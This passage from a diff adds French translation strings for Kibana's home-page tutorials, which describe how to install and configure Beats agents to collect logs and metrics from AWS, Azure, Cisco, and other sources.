démon d'audit (''auditd'') [En savoir plus]({learnMoreLink}).", + "home.tutorials.awsLogs.longDescription": "Collectez des logs AWS en les exportant vers un compartiment S3 configuré avec la notification SQS [En savoir plus]({learnMoreLink}).", + "home.tutorials.awsMetrics.longDescription": "Le module Metricbeat ''aws'' récupère les indicateurs depuis les API AWS et Cloudwatch. [En savoir plus]({learnMoreLink}).", + "home.tutorials.azureLogs.longDescription": "Le module Filebeat ''azure'' collecte les logs d’activité et d’audit Azure. [Learn more]({learnMoreLink}).", + "home.tutorials.azureMetrics.longDescription": "Le module Metricbeat ''azure'' récupère les indicateurs de monitoring Azure. [En savoir plus]({learnMoreLink}).", + "home.tutorials.barracudaLogs.longDescription": "Ce module permet de recevoir les logs Barracuda Web Application Firewall par le biais de Syslog ou d’un fichier. [Learn more]({learnMoreLink}).", + "home.tutorials.bluecoatLogs.longDescription": "Ce module permet de recevoir les logs Blue Coat Director par le biais de Syslog ou d’un fichier. [Learn more]({learnMoreLink}).", + "home.tutorials.cefLogs.longDescription": "Ce module permet de recevoir des données Common Event Format (CEF) par le biais de Syslog. Lorsque des messages sont reçus par le biais du protocole Syslog, l'entrée Syslog analyse l'en-tête et définit la valeur d'horodatage. Puis le processeur est appliqué pour analyser les données CEF. Les données décodées sont alors écrites dans un champ objet ''cef''. Enfin, tous les champs Elastic Common Schema (ECS) ayant des correspondances CEF sont renseignés. [En savoir plus]({learnMoreLink}).", + "home.tutorials.cephMetrics.longDescription": "Le module Metricbeat ''ceph'' récupère les indicateurs depuis Ceph. [En savoir plus]({learnMoreLink}).", + "home.tutorials.checkpointLogs.longDescription": "Il s'agit d'un module pour les logs de pare-feu Check Point. Il prend en charge les logs de l’exportateur de journaux au format Syslog. [Learn more]({learnMoreLink}).", + "home.tutorials.ciscoLogs.longDescription": "Il s'agit d'un module pour les logs de dispositifs réseau Cisco (ASA, FTD, IOS, Nexus). Il inclut les ensembles de fichiers suivants pour la réception des logs par le biais de Syslog ou d'un ficher. [En savoir plus]({learnMoreLink}).", + "home.tutorials.cloudwatchLogs.longDescription": "Collectez les logs Cloudwatch en déployant Functionbeat à des fins d'exécution en tant que fonction AWS Lambda. [En savoir plus]({learnMoreLink}).", + "home.tutorials.cockroachdbMetrics.longDescription": "Le module Metricbeat ''cockroachbd'' récupère les indicateurs depuis CockroachDB. [En savoir plus]({learnMoreLink}).", + "home.tutorials.common.auditbeatCloudInstructions.config.debTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.auditbeatCloudInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.auditbeatCloudInstructions.config.rpmTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.auditbeatCloudInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.auditbeatInstructions.config.debTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.auditbeatInstructions.config.debTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.auditbeatInstructions.config.osxTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.auditbeatInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.auditbeatInstructions.config.rpmTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.auditbeatInstructions.config.rpmTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.auditbeatInstructions.config.windowsTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.auditbeatInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.auditbeatInstructions.install.debTextPost": "Vous cherchez les packages 32 bits ? Consultez la [page de téléchargement]({linkUrl}).", + "home.tutorials.common.auditbeatInstructions.install.debTextPre": "Vous utilisez Auditbeat pour la première fois ? Consultez le [guide de démarrage rapide]({linkUrl}).", + "home.tutorials.common.auditbeatInstructions.install.osxTextPre": "Vous utilisez Auditbeat pour la première fois ? Consultez le [guide de démarrage rapide]({linkUrl}).", + "home.tutorials.common.auditbeatInstructions.install.rpmTextPost": "Vous cherchez les packages 32 bits ? Consultez la [page de téléchargement]({linkUrl}).", + "home.tutorials.common.auditbeatInstructions.install.rpmTextPre": "Vous utilisez Auditbeat pour la première fois ? Consultez le [guide de démarrage rapide]({linkUrl}).", + "home.tutorials.common.auditbeatInstructions.install.windowsTextPost": "Modifiez les paramètres sous {propertyName} dans le fichier {auditbeatPath} afin de pointer vers votre installation Elasticsearch.", + "home.tutorials.common.auditbeatInstructions.install.windowsTextPre": "Vous utilisez Auditbeat pour la première fois ? Consultez le [guide de démarrage rapide]({guideLinkUrl}).\n 1. Téléchargez le fichier .zip Auditbeat pour Windows via la page [Télécharger]({auditbeatLinkUrl}).\n 2. Extrayez le contenu du fichier compressé sous {folderPath}.\n 3. Renommez le répertoire \"{directoryName}\" en \"Auditbeat\".\n 4. Ouvrez une invite PowerShell en tant qu'administrateur (faites un clic droit sur l'icône PowerShell et sélectionnez **Exécuter en tant qu'administrateur**). Si vous exécutez Windows XP, vous devrez peut-être télécharger et installer PowerShell.\n 5. Dans l'invite PowerShell, exécutez les commandes suivantes afin d'installer Auditbeat en tant que service Windows.", + "home.tutorials.common.filebeatCloudInstructions.config.debTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.filebeatCloudInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.filebeatCloudInstructions.config.rpmTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.filebeatCloudInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.filebeatEnableInstructions.debTextPost": "Modifiez les paramètres dans le fichier ''/etc/filebeat/modules.d/{moduleName}.yml''.", + "home.tutorials.common.filebeatEnableInstructions.debTitle": "Activer et configurer le module {moduleName}", + "home.tutorials.common.filebeatEnableInstructions.osxTextPost": "Modifiez les paramètres dans le fichier ''modules.d/{moduleName}.yml''.", + "home.tutorials.common.filebeatEnableInstructions.osxTitle": "Activer et configurer le module {moduleName}", + "home.tutorials.common.filebeatEnableInstructions.rpmTextPost": "Modifiez les paramètres dans le fichier ''/etc/filebeat/modules.d/{moduleName}.yml''.", + "home.tutorials.common.filebeatEnableInstructions.rpmTitle": "Activer et configurer le module {moduleName}", + "home.tutorials.common.filebeatEnableInstructions.windowsTextPost": "Modifiez les paramètres dans le fichier ''modules.d/{moduleName}.yml''.", + "home.tutorials.common.filebeatEnableInstructions.windowsTextPre": "Dans le dossier {path}, exécutez la commande suivante :", + "home.tutorials.common.filebeatEnableInstructions.windowsTitle": "Activer et configurer le module {moduleName}", + "home.tutorials.common.filebeatInstructions.config.debTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.filebeatInstructions.config.debTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.filebeatInstructions.config.osxTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.filebeatInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.filebeatInstructions.config.rpmTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.filebeatInstructions.config.rpmTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.filebeatInstructions.config.windowsTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.filebeatInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.filebeatInstructions.install.debTextPost": "Vous cherchez les packages 32 bits ? Consultez la [page de téléchargement]({linkUrl}).", + "home.tutorials.common.filebeatInstructions.install.debTextPre": "Vous utilisez Filebeat pour la première fois ? Consultez le [guide de démarrage rapide]({linkUrl}).", + "home.tutorials.common.filebeatInstructions.install.osxTextPre": "Vous utilisez Filebeat pour la première fois ? Consultez le [guide de démarrage rapide]({linkUrl}).", + "home.tutorials.common.filebeatInstructions.install.rpmTextPost": "Vous cherchez les packages 32 bits ? Consultez la [page de téléchargement]({linkUrl}).", + "home.tutorials.common.filebeatInstructions.install.rpmTextPre": "Vous utilisez Filebeat pour la première fois ? Consultez le [guide de démarrage rapide]({linkUrl}).", + "home.tutorials.common.filebeatInstructions.install.windowsTextPost": "Modifiez les paramètres sous {propertyName} dans le fichier {filebeatPath} afin de pointer vers votre installation Elasticsearch.", + "home.tutorials.common.filebeatInstructions.install.windowsTextPre": "Vous utilisez Filebeat pour la première fois ? Consultez le [guide de démarrage rapide]({guideLinkUrl}).\n 1. Téléchargez le fichier .zip Filebeat pour Windows via la page [Télécharger]({filebeatLinkUrl}).\n 2. Extrayez le contenu du fichier compressé sous {folderPath}.\n 3. Renommez le répertoire \"{directoryName}\" en \"Filebeat\".\n 4. Ouvrez une invite PowerShell en tant qu'administrateur (faites un clic droit sur l'icône PowerShell et sélectionnez **Exécuter en tant qu'administrateur**). Si vous exécutez Windows XP, vous devrez peut-être télécharger et installer PowerShell.\n 5. Dans l'invite PowerShell, exécutez les commandes suivantes afin d'installer Filebeat en tant que service Windows.", + "home.tutorials.common.filebeatStatusCheck.text": "Vérifier que des données sont reçues du module Filebeat \"{moduleName}\"", + "home.tutorials.common.functionbeatCloudInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.functionbeatCloudInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.functionbeatEnableOnPremInstructionsWindows.textPre": "Modifiez les paramètres dans le fichier {path}.", + "home.tutorials.common.functionbeatInstructions.config.osxTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.functionbeatInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.functionbeatInstructions.config.windowsTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.functionbeatInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.functionbeatInstructions.install.linuxTextPre": "Vous utilisez Functionbeat pour la première fois ? Consultez le [guide de démarrage rapide]({link}).", + "home.tutorials.common.functionbeatInstructions.install.osxTextPre": "Vous utilisez Functionbeat pour la première fois ? Consultez le [guide de démarrage rapide]({link}).", + "home.tutorials.common.functionbeatInstructions.install.windowsTextPre": "Vous utilisez Functionbeat pour la première fois ? Consultez le [guide de démarrage rapide]({functionbeatLink}).\n 1. Téléchargez le fichier .zip Functionbeat pour Windows via la page [Télécharger]({elasticLink}).\n 2. Extrayez le contenu du fichier compressé sous {folderPath}.\n 3. Renommez le répertoire \"{directoryName}\" en \"Functionbeat\".\n 4. Ouvrez une invite PowerShell en tant qu'administrateur (faites un clic droit sur l'icône PowerShell et sélectionnez **Exécuter en tant qu'administrateur**). Si vous exécutez Windows XP, vous devrez peut-être télécharger et installer PowerShell.\n 5. Depuis l'invite PowerShell, accédez au répertoire Functionbeat :", + "home.tutorials.common.heartbeatCloudInstructions.config.debTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.heartbeatCloudInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.heartbeatCloudInstructions.config.rpmTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.heartbeatCloudInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.heartbeatEnableCloudInstructions.defaultTextPost": "Pour plus d’informations sur comment configurer des moniteurs dans Heartbeat, consultez les [documents de configuration de Heartbeat.]({configureLink})", + "home.tutorials.common.heartbeatEnableOnPremInstructions.defaultTextPost": "Où {hostTemplate} est l’URL monitorée. Pour plus d’informations sur comment configurer des moniteurs dans Heartbeat, consultez les [documents de configuration de Heartbeat.]({configureLink})", + "home.tutorials.common.heartbeatInstructions.config.debTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.heartbeatInstructions.config.debTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.heartbeatInstructions.config.osxTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.heartbeatInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.heartbeatInstructions.config.rpmTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.heartbeatInstructions.config.rpmTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.heartbeatInstructions.config.windowsTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.heartbeatInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.heartbeatInstructions.install.debTextPost": "Vous cherchez les packages 32 bits ? Consultez la [page de téléchargement]({link}).", + "home.tutorials.common.heartbeatInstructions.install.debTextPre": "Vous utilisez Heartbeat pour la première fois ? Consultez le [guide de démarrage rapide]({link}).", + "home.tutorials.common.heartbeatInstructions.install.osxTextPre": "Vous utilisez Heartbeat pour la première fois ? Consultez le [guide de démarrage rapide]({link}).", + "home.tutorials.common.heartbeatInstructions.install.rpmTextPre": "Vous utilisez Heartbeat pour la première fois ? Consultez le [guide de démarrage rapide]({link}).", + "home.tutorials.common.heartbeatInstructions.install.windowsTextPre": "Vous utilisez Heartbeat pour la première fois ? Consultez le [guide de démarrage rapide]({heartbeatLink}).\n 1. Téléchargez le fichier .zip Heartbeat pour Windows via la page [Télécharger]({elasticLink}).\n 2. Extrayez le contenu du fichier compressé sous {folderPath}.\n 3. Renommez le répertoire \"{directoryName}\" en \"Heartbeat\".\n 4. Ouvrez une invite PowerShell en tant qu'administrateur (faites un clic droit sur l'icône PowerShell et sélectionnez **Exécuter en tant qu'administrateur**). Si vous exécutez Windows XP, vous devrez peut-être télécharger et installer PowerShell.\n 5. Dans l'invite PowerShell, exécutez les commandes suivantes afin d'installer Heartbeat en tant que service Windows.", + "home.tutorials.common.logstashInstructions.install.java.osxTextPre": "Suivez les instructions d'installation [ici]({link}).", + "home.tutorials.common.logstashInstructions.install.java.windowsTextPre": "Suivez les instructions d'installation [ici]({link}).", + "home.tutorials.common.logstashInstructions.install.logstash.osxTextPre": "Vous utilisez Logstash pour la première fois ? Consultez le [guide de démarrage rapide]({link}).", + "home.tutorials.common.logstashInstructions.install.logstash.windowsTextPre": "Vous utilisez Logstash pour la première fois ? Consultez le [guide de démarrage rapide]({logstashLink}).\n 1. [Téléchargez]({elasticLink}) le fichier .zip Logstash pour Windows.\n 2. Extrayez le contenu du fichier compressé.", + "home.tutorials.common.metricbeatCloudInstructions.config.debTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.metricbeatCloudInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.metricbeatCloudInstructions.config.rpmTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.metricbeatCloudInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.metricbeatEnableInstructions.debTextPost": "Modifiez les paramètres dans le fichier ''/etc/metricbeat/modules.d/{moduleName}.yml''.", + "home.tutorials.common.metricbeatEnableInstructions.debTitle": "Activer et configurer le module {moduleName}", + "home.tutorials.common.metricbeatEnableInstructions.osxTextPost": "Modifiez les paramètres dans le fichier ''modules.d/{moduleName}.yml''.", + "home.tutorials.common.metricbeatEnableInstructions.osxTitle": "Activer et configurer le module {moduleName}", + "home.tutorials.common.metricbeatEnableInstructions.rpmTextPost": "Modifiez les paramètres dans le fichier ''/etc/metricbeat/modules.d/{moduleName}.yml''.", + "home.tutorials.common.metricbeatEnableInstructions.rpmTitle": "Activer et configurer le module {moduleName}", + "home.tutorials.common.metricbeatEnableInstructions.windowsTextPost": "Modifiez les paramètres dans le fichier ''modules.d/{moduleName}.yml''.", + "home.tutorials.common.metricbeatEnableInstructions.windowsTextPre": "Dans le dossier {path}, exécutez la commande suivante :", + "home.tutorials.common.metricbeatEnableInstructions.windowsTitle": "Activer et configurer le module {moduleName}", + "home.tutorials.common.metricbeatInstructions.config.debTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.metricbeatInstructions.config.debTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.metricbeatInstructions.config.osxTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.metricbeatInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.metricbeatInstructions.config.rpmTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.metricbeatInstructions.config.rpmTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.metricbeatInstructions.config.windowsTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.metricbeatInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.metricbeatInstructions.install.debTextPost": "Vous cherchez les packages 32 bits ? Consultez la [page de téléchargement]({link}).", + "home.tutorials.common.metricbeatInstructions.install.debTextPre": "Vous utilisez Metricbeat pour la première fois ? Consultez le [guide de démarrage rapide]({link}).", + "home.tutorials.common.metricbeatInstructions.install.osxTextPre": "Vous utilisez Metricbeat pour la première fois ? Consultez le [guide de démarrage rapide]({link}).", + "home.tutorials.common.metricbeatInstructions.install.rpmTextPre": "Vous utilisez Metricbeat pour la première fois ? Consultez le [guide de démarrage rapide]({link}).", + "home.tutorials.common.metricbeatInstructions.install.windowsTextPost": "Modifiez les paramètres sous \"output.elasticsearch\" dans le fichier {path} afin de pointer vers votre installation Elasticsearch.", + "home.tutorials.common.metricbeatInstructions.install.windowsTextPre": "Vous utilisez Metricbeat pour la première fois ? Consultez le [guide de démarrage rapide]({metricbeatLink}).\n 1. Téléchargez le fichier .zip Metricbeat pour Windows via la page [Télécharger]({elasticLink}).\n 2. Extrayez le contenu du fichier compressé sous {folderPath}.\n 3. Renommez le répertoire \"{directoryName}\" en \"Metricbeat\".\n 4. Ouvrez une invite PowerShell en tant qu'administrateur (faites un clic droit sur l'icône PowerShell et sélectionnez **Exécuter en tant qu'administrateur**). Si vous exécutez Windows XP, vous devrez peut-être télécharger et installer PowerShell.\n 5. Dans l'invite PowerShell, exécutez les commandes suivantes afin d'installer Metricbeat en tant que service Windows.", + "home.tutorials.common.metricbeatStatusCheck.text": "Vérifier que des données sont reçues du module Metricbeat \"{moduleName}\"", + "home.tutorials.common.premCloudInstructions.option1.textPre": "Rendez-vous sur [Elastic Cloud]({link}). Enregistrez-vous si vous n'avez pas encore de compte. Un essai gratuit de 14 jours est disponible.\n\nConnectez-vous à la console Elastic Cloud.\n\nPour créer un cluster, dans la console Elastic Cloud :\n 1. Sélectionnez **Créer un déploiement** et spécifiez le **Nom du déploiement**.\n 2. Modifiez les autres options de déploiement selon les besoins (sinon, les valeurs par défaut sont très bien pour commencer).\n 3. Cliquer sur **Créer un déploiement**\n 4. Attendre la fin de la création du déploiement\n 5. Accéder à la nouvelle instance cloud Kibana et suivre les instructions de la page d'accueil de Kibana", + "home.tutorials.common.premCloudInstructions.option2.textPre": "Si vous exécutez cette instance Kibana sur une instance Elasticsearch hébergée, passez à la configuration manuelle.\n\nEnregistrez le point de terminaison **Elasticsearch** en tant que {urlTemplate} et le cluster **Mot de passe** en tant que {passwordTemplate} pour les conserver.", + "home.tutorials.common.winlogbeatCloudInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.winlogbeatInstructions.config.windowsTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas 